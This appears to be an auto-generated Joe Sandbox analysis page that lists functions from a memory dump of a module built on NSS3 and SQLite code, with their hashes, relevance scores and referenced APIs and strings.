Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 896a363789ded3f1197fe71c9c1d172e37bdf826f34d88746e70514c46a1bf0d
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 50D17F26B4354B4BFB34587C8EA13D9B7938B42374F584B2BD5218BFEAE6198843C351

Function 6C82AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction ID: fb9b44df4fd5ee51168c64683cace25be7ecd3059c00ac6223fe351011d8938a
Opcode Fuzzy Hash: 4d80669e2d6c93919d21cbe2510f36273f1288ba8d4599a6bde9fa3de6f6bda7
Instruction Fuzzy Hash: 9AF1C071E021558BEB34CF28DA557AA77F0BB8A308F15463DC906D7740E778AA95CBC0

Function 6C7E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7E1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7E1086

Strings

h(~l, xrefs: 6C7E0E55, 6C7E0EC4, 6C7E0F3A, 6C7E0FA7
h(~l, xrefs: 6C7E1062, 6C7E105D, 6C7E0F37, 6C7E1081, 6C7E1082

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(~l$h(~l
API String ID: 1297977491-3782546141
Opcode ID: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction ID: 39f3364e6b4d4d6130b8c76b1be44e8ce54757e8364e44ef870a9cec64ae9336
Opcode Fuzzy Hash: 8810c631849fd125c2f3e8650083e65db5083992d23e313ea42d9acc8c83f728
Instruction Fuzzy Hash: F5A13D72B0125A9FDB08CF99C994AEEB7B6BF8C314B148139E915A7701DB35EC11CB90

Function 6C756900 Relevance: 6.3, Strings: 4, Instructions: 1257COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C7578EC, 6C7578F1
BBB, xrefs: 6C757207, 6C75780B
authorizer malfunction, xrefs: 6C757910
sqlite\_%, xrefs: 6C756953

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: BBB$authorizer malfunction$not authorized$sqlite\_%
API String ID: 3412268980-2664116055
Opcode ID: 45278efa674958d9166794f713adcdfb9a203dc1352f8c339ac9aa4549e3ed6a
Instruction ID: ba9fe5de650f9e95e2ee04eb8c54aeb8a065ba053c401cc1c3a9da82ede5a249
Opcode Fuzzy Hash: 45278efa674958d9166794f713adcdfb9a203dc1352f8c339ac9aa4549e3ed6a
Instruction Fuzzy Hash: F4C2B070E00205CFCB14CF58C584AA9BBF2FF89308F6481ADD915AB755DB36A966CF80

Function 6C706F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

noskipscan*, xrefs: 6C707067
*?[, xrefs: 6C707034, 6C707052, 6C707070
sz=[0-9]*, xrefs: 6C707049
unordered*, xrefs: 6C70702B

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction ID: 0805549e97300d8daf0e0a06d05caf3e1aa3fa30fc0a9731ab087312363ee06f
Opcode Fuzzy Hash: bf146ed8872dc92a3ac4071ffb9920fcd4b9e184cdf519d57f1b341e6e87e5e8
Instruction Fuzzy Hash: 8B718BF2F002154BEB248A6CCA9039E73E29F81354F294339CD69ABBD3D6719D4687D1

Function 6C840B40 Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_bind_int64.NSS3(?,?,?,?), ref: 6C840B7C
sqlite3_bind_double.NSS3 ref: 6C840BF1
sqlite3_bind_zeroblob.NSS3(?,?,00000000), ref: 6C840C27

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_bind_zeroblob
String ID:
API String ID: 4141409403-0
Opcode ID: 749c53963a03ac4e23ae4d4ae7395e735da80a23782c32f7816779a6e18b9b21
Instruction ID: 4d0017795f3dd649dedf94327723b672f79171eef5a469be4697213c7a4a2f19
Opcode Fuzzy Hash: 749c53963a03ac4e23ae4d4ae7395e735da80a23782c32f7816779a6e18b9b21
Instruction Fuzzy Hash: C221543294895CAFD7115B188D0496BB7B9EF9673CF19C654E8940B792DB309801C3DA

Function 6C79EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C79F0F9

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 695312eba94fb1bc17efd15af4b0791ba30f17ada78c92e8d72c98454beba451
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: DC91B071E0061A8BCB14CF68D9906AEB7F1FF85324F24462DE926A7BC1D730A905CB90

Function 6C7C2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C7E7929), ref: 6C7C2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C7E7929), ref: 6C7C2FE0

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction ID: 5d77cb985be534154fde0da4b42f05ee295af70386b9191af1de190d9e5d91c2
Opcode Fuzzy Hash: c2d8f9844c5c9ded069efae989610508132f48daa2c21d78b5b2c8924c3f03e7
Instruction Fuzzy Hash: 9E51D272B049178FD7108E59CA84BEA73B2FB45318F254179DD099BB02D735E986CB83

Function 6C70AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C70AE9F
winUnlock, xrefs: 6C70AE18

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction ID: b6f307c2658bb00a5ad1fa335be71a3a84e4bc92077dec3ec05f55cf95ce56e3
Opcode Fuzzy Hash: 8286ba93b060f0797e5aaa9709bebeb102b51a47fe6cff5740a2a40823797c96
Instruction Fuzzy Hash: 89717F716042409BDB24CF28D895AABBBF5FF89318F14CA29F94997701D730A985CBC1

Function 6C7349F0 Relevance: 1.9, APIs: 1, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7883769c29db0d37edbe040425d06b3d02c63ccc08bfe7484e9114ca1e9bf1
Instruction ID: 271449b672522d2a549ced7da33c29bc3d1e6d0abeaff71b314414d5f22d71fe
Opcode Fuzzy Hash: 4f7883769c29db0d37edbe040425d06b3d02c63ccc08bfe7484e9114ca1e9bf1
Instruction Fuzzy Hash: 60527174E002198FDB08CF59D580B9EBBF2FF89314F259169D9186B752D736E842CB90

Function 6C7CED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C7CEE3D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 9127789fb1516fa174b0858e974cf77ea96dade85fc2697538dc131452c94842
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 6E71D372F0170A8FE718CF59CA8166AB7F2BF88304F15862DD85697B91D770E940CB92

Function 6C704DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C705125

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction ID: 31419b0a65a6b9e9e4f61bd551f0552f04fe27ee1a3f85a521c56877684d9f57
Opcode Fuzzy Hash: a137f98c5cbe8beeb1e42170f17fe615672b4328f76c41dbe1d064d65fc2389e
Instruction Fuzzy Hash: AEE14DB0A183408FDB54DF28D585A5ABBF0FF89308F15862DF89997351E730A985CBC2

Function 6C76EBF0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C76EC05

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7e36d5ea2e11bfb54ee06e26599e5a8ad25a20ad9a2fccf4d4022cb9dd1af9c4
Instruction ID: c2115befe7471efbbda1673276f8a7536b9776bb4a54ac2253e302b91439a93a
Opcode Fuzzy Hash: 7e36d5ea2e11bfb54ee06e26599e5a8ad25a20ad9a2fccf4d4022cb9dd1af9c4
Instruction Fuzzy Hash: 9DE0C231A0022C9B8B10AFADD9514DEB7B8EF0D214B411425D90A6B300DA207A48CBE2

Function 6C78A820 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

[[wl, xrefs: 6C78A943, 6C78A92D

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID: [[wl
API String ID: 0-2044417196
Opcode ID: d19638d48064955dbda65cf9dfb2b6c97f1d5ba60c542999b24c70523b13a9d1
Instruction ID: fd53537c9af526e7a211feff379490e6f40fc784938a949c598e4e8ae12e16f6
Opcode Fuzzy Hash: d19638d48064955dbda65cf9dfb2b6c97f1d5ba60c542999b24c70523b13a9d1
Instruction Fuzzy Hash: 2D519B71A06209CFDB05CF19DA48BAA7BE5FF48328F26807DE9199B790D734D851CB90

Function 6C738960 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction ID: 220f3b1611e6e544eae46b56c24d2bf22d3f48137fcc338d408b6c2651d0ee5b
Opcode Fuzzy Hash: 479b8d2f213f65b1b536ab0ea025c35109ca1eff46ca7d7c516c56307c097544
Instruction Fuzzy Hash: 8FD18271F052268FDB08CEA9C6816AEB7F2FB89304F25957BC559E7642D7309C41CB90

Function 6C768EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction ID: 85772269306ed6f060212d7909bf1a2573831f66db85f77dbef2c698e1f87e9b
Opcode Fuzzy Hash: c235c778469c908188888b6195c34337e534f883589db312a2180aad853b8966
Instruction Fuzzy Hash: 1E119D32A002158BD714CF26D988B9AB3A9BF8231CF08427AD8158FE42C775E886C7C1

Function 6C840C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction ID: 387ae1043f323600d9da068388c65629caa9d269208999414f307bb6321cdd60
Opcode Fuzzy Hash: 005207e60937fb1fe5598cd68a2eef584fadeafff031d01e445dbadd68acbd89
Instruction Fuzzy Hash: 3911BC75604249CFCB20DF28C88066B77A2FF95368F14C879D8298B701DB71E806CBA1

Function 6C840D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 6812d79cce13ec76fe969c216d480c7c03adb4f4b1463c078b562b479e08346e
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: 80E06D3A202058A7DB248E49C550BAA7359DF9161AFA4C979CC599BA01D733F8078B81

Function 6C76CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction ID: 9ad117ff6351e41c3ec7abf1d939d8cc17f8e97802fb2e5db7c2c8b76a7430b9
Opcode Fuzzy Hash: 1780fd669f180d2d3ff48b230971e0e9ac02db7fbbfc2f500286e3bed2dedb2c
Instruction Fuzzy Hash: C2C04838244608CFC744DB08E489DA43BA8AB8961070440A4EA028B722DA21FC00CA80

Function 6C8809D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C880A22

Part of subcall function 6C839DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DC6
Part of subcall function 6C839DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C880A27), ref: 6C839DD1
Part of subcall function 6C839DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C839DED

PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35

Part of subcall function 6C763810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C76382A
Part of subcall function 6C763810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C763879

